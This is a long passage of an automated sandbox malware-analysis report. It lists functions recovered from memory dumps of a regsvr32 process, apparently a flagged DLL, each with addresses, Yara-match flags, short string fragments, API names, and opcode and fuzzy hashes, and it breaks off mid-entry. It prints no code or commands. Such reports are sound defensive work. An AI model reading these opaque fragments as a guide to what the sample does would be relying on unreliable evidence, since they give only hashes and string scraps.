                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #X$rq%$tL>$".
                                                                                                  • API String ID: 0-3922733902
                                                                                                  • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                  • Instruction ID: 106f5664a8f1aa7ff5d9aba620061c10459693191bc8505ae34b750e2cb15c46
                                                                                                  • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                  • Instruction Fuzzy Hash: 3222C2719097C88BDBF8DF24C8896DD37F0FF48344F50215A984EAA694DBB86685CF42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1AD28 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: g$-$HE$Vc
                                                                                                  • API String ID: 0-2562162751
                                                                                                  • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                  • Instruction ID: 34afe11b47f37ab55318b857c78e5f87981c9c0ef31ba8f61ac0ae0e0d86fe94
                                                                                                  • Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                  • Instruction Fuzzy Hash: 06A1E2B150478C9FDB88CF28D88A4CD3BB2FB58358F505219FC4A97260D7B8D985CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E080CC Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (;$*i$he$*%
                                                                                                  • API String ID: 0-35414758
                                                                                                  • Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                  • Instruction ID: ef950592c0a8c97ae84ea920fe8266ac05fede72a77f76e665cfdf552c6197a6
                                                                                                  • Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                  • Instruction Fuzzy Hash: 76711870514749DBDF48CF28C88A5DD3BA1FB4835CF566319FC8AA6290D778D884CB89
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0D474 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: */$I$Yu$(
                                                                                                  • API String ID: 0-674225443
                                                                                                  • Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                  • Instruction ID: 1b118042cc7599992217ba3788a35e778bf8c89850481b3d8d8f862aa713a4f3
                                                                                                  • Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                  • Instruction Fuzzy Hash: C2718DB190070ACFDB58CF68D48A5DE7FB0FB68398F204219F85596260D7B49AA5CFC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E014D4 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #X$.:$PYq|$W
                                                                                                  • API String ID: 0-626586655
                                                                                                  • Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                  • Instruction ID: 623235f0e196be6d94089cddda6ed224ae06b15f539ff0e5a0ecae035ce6ab21
                                                                                                  • Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                  • Instruction Fuzzy Hash: 5A41F27061CB848FD7A8DF28D58A65BBBF0FBD9704F805A1EE589C7250DB749804CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E14A90 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -+$0u$S$e!
                                                                                                  • API String ID: 0-4217091389
                                                                                                  • Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                  • Instruction ID: 30ea3e3ea36e0ce89afa80e3a3390059829407905da68f89f0108f2b7409bfb9
                                                                                                  • Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                  • Instruction Fuzzy Hash: 5941F3B090034A8FDB48CF64C88A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0A660 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 5`$<ml$a:$P
                                                                                                  • API String ID: 0-330785107
                                                                                                  • Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                  • Instruction ID: 9e767be398b145fef4659a1bad9a67ace48f7b7104deef417815ffc7bd490679
                                                                                                  • Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                  • Instruction Fuzzy Hash: 914104B190074E8BDB48DF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E03274 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: o$"B$SJ$wU
                                                                                                  • API String ID: 0-691100934
                                                                                                  • Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                  • Instruction ID: 5a541b8f2f9017e4bb8e99fc93aaf3ad22d8c91e114aa7e22ecf66be9bc4a42a
                                                                                                  • Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                  • Instruction Fuzzy Hash: 9D41F2B180078ECFDB48CF68C88A4DE7BF0FB58358F104619E859A6254D3B89695CFC5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E01B94 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 9luJ$=2y}$=2y}$b
                                                                                                  • API String ID: 0-1667874806
                                                                                                  • Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                  • Instruction ID: aa57b421858d3e039772faab43d92329370059b3db58ab2cd4fb3fbdb0b4789a
                                                                                                  • Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                  • Instruction Fuzzy Hash: E541D6B181038EDFDF44CF64D88A4CE7BB0FB18358F110A19F865A62A4D3B89665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E048FC Relevance: 4.0, Strings: 3, Instructions: 225COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ;$O,$fdu
                                                                                                  • API String ID: 0-1721916326
                                                                                                  • Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                  • Instruction ID: dd50258386073634785f4cfd19cfa09355625dbce358868bcb3742fd30161a2b
                                                                                                  • Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                  • Instruction Fuzzy Hash: F3A115B0D14718EBDB58DFA8E8C999DBBF1FB54314F004219E816B72A0DB749985CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E03E0C Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: u$&v$f
                                                                                                  • API String ID: 0-1868853588
                                                                                                  • Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                  • Instruction ID: 347e364158a0f1f00bc7207c674fe2a096c724371d0b6576a00a0b45a32f5a95
                                                                                                  • Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                  • Instruction Fuzzy Hash: 90713471D04709ABCB1CDFA8E5D959DBBB1FB48314F10422DE816B72A0CB749A85CF81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1E750 Relevance: 3.9, Strings: 3, Instructions: 145COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: o$j$t
                                                                                                  • API String ID: 0-2067604139
                                                                                                  • Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                  • Instruction ID: 18649911257e17ad6fa255ef29938ff70901b48e77053c8ab8130b36b710e402
                                                                                                  • Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                  • Instruction Fuzzy Hash: 6061DF715087848BD368DF28C18A55BBBF1FBC6704F104A1DF68A9B2A0D77AD944CB43
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1D5F0 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: P$KGRa$wy
                                                                                                  • API String ID: 0-4077564265
                                                                                                  • Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                  • Instruction ID: d621e202ffea213f0ea9af14c4edc95d019645cc49daeacb6dfe415558fc7184
                                                                                                  • Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                  • Instruction Fuzzy Hash: B941C0B090074A8BDF48CF68C8865DE7FB0FB68348F55461DE84AA6290D37896A4CFC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E18BB8 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: =$N@`Y$`Y
                                                                                                  • API String ID: 0-2183226064
                                                                                                  • Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                  • Instruction ID: 5222e828b4b669c78658925fb0be058838b63d29e38bbf1f0f5c61d2cacdf583
                                                                                                  • Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                  • Instruction Fuzzy Hash: D151C3B190074E8FDB44CF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1EAC0 Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: '0$~?$\
                                                                                                  • API String ID: 0-629757258
                                                                                                  • Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                  • Instruction ID: cc6d517053a9e2603b12dfc9a0a13288b782b58b38ade8d63c2a336585f6af26
                                                                                                  • Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                  • Instruction Fuzzy Hash: 8641CEB0548B808BE718CF28C59A51ABBF1FBC5344F604A2DF6968A3A0D775D885CF42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0DCB8 Relevance: 3.8, Strings: 3, Instructions: 80COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: A7$z$~*b
                                                                                                  • API String ID: 0-275545515
                                                                                                  • Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                  • Instruction ID: af5d65540fded4370c4e97112ddc4c2e82b1c3c3d4aac5ebe6f355ada8613144
                                                                                                  • Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                  • Instruction Fuzzy Hash: ED41C4B180074ECFDB48CF64C48A5DE7FB0FB64398F204619E855A6290D3B896A9CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0A7F0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: H$rTk=${,%
                                                                                                  • API String ID: 0-3174111592
                                                                                                  • Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                  • Instruction ID: 148e704a8d16fd51d66fdab4448402af6282a671a822f8ce9a555cffecfbdb01
                                                                                                  • Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                  • Instruction Fuzzy Hash: 6E31E9705287859BD798DF28C4C991EBBE1FBC4354F946A2CF482872A1D779D485CB03
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000B878 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                  • String ID:
                                                                                                  • API String ID: 15204871-0
                                                                                                  • Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                  • Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
                                                                                                  • Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                  • Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180010DB0 Relevance: 3.0, APIs: 2, Instructions: 20nativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LinkObjectOpenSymbolic
                                                                                                  • String ID:
                                                                                                  • API String ID: 3706036087-0
                                                                                                  • Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                  • Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
                                                                                                  • Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                  • Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E13FD0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D?"$8zfK
                                                                                                  • API String ID: 0-617590365
                                                                                                  • Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                  • Instruction ID: 2e715f1e1404219753842cc207c7ae60c254710ac66bb562b807bb5d63ba87bf
                                                                                                  • Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                  • Instruction Fuzzy Hash: A71201B550560DCBDB68DF38C48A49E3BE1FF58308F205129FC269B2A2D774D964CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0C078 Relevance: 2.9, Strings: 2, Instructions: 384COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #X$h}
                                                                                                  • API String ID: 0-3021649463
                                                                                                  • Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                  • Instruction ID: 76284c63707943ac2ce0d7e08acaa3b9ccef569434eacdc9f950646133b19762
                                                                                                  • Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                  • Instruction Fuzzy Hash: E522AA709097888BEBF8DF24C8856D97BF0FF44704F90651ED84EAA690DB786685CF42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E29910 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #X$+ <
                                                                                                  • API String ID: 0-1007305072
                                                                                                  • Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                  • Instruction ID: cd4b2295a8fd20270e418ebfa7c35920e6900d6d33520d35da4d55597ff4aa5a
                                                                                                  • Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                  • Instruction Fuzzy Hash: D50278B5900709CFDB88CF68C58A5DD3BB9FB59308F404129FC1E9A2A0D3B4E919CB56
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1B460 Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Hc$aYG
                                                                                                  • API String ID: 0-2147329803
                                                                                                  • Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                  • Instruction ID: 5c75054948f33a10e49cb6c70a873caf62a5a18bdede66c10ed2c599f5359150
                                                                                                  • Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                  • Instruction Fuzzy Hash: 81D1207560170DCBDB68CF28C58A5DE3BE9FF54308F104129FC1A962A5D7B8E829CB46
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E033D4 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Ip$2/
                                                                                                  • API String ID: 0-2558650176
                                                                                                  • Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                  • Instruction ID: d0396a94f986c2749e4f1416e6c4ab212fec6a00c7aadfaf3dd5a230886b5b57
                                                                                                  • Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                  • Instruction Fuzzy Hash: 94E1C571505B888FEBB8DF24CC99BEB7BA0FB84306F10551AD84AEE290DB745685CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E04214 Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID: h$j-`
                                                                                                  • API String ID: 963392458-2572860821
                                                                                                  • Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                  • Instruction ID: 15ee7218ea82a19f3702cef7a5a8bd1304e97405b63536af0844e803a2e12657
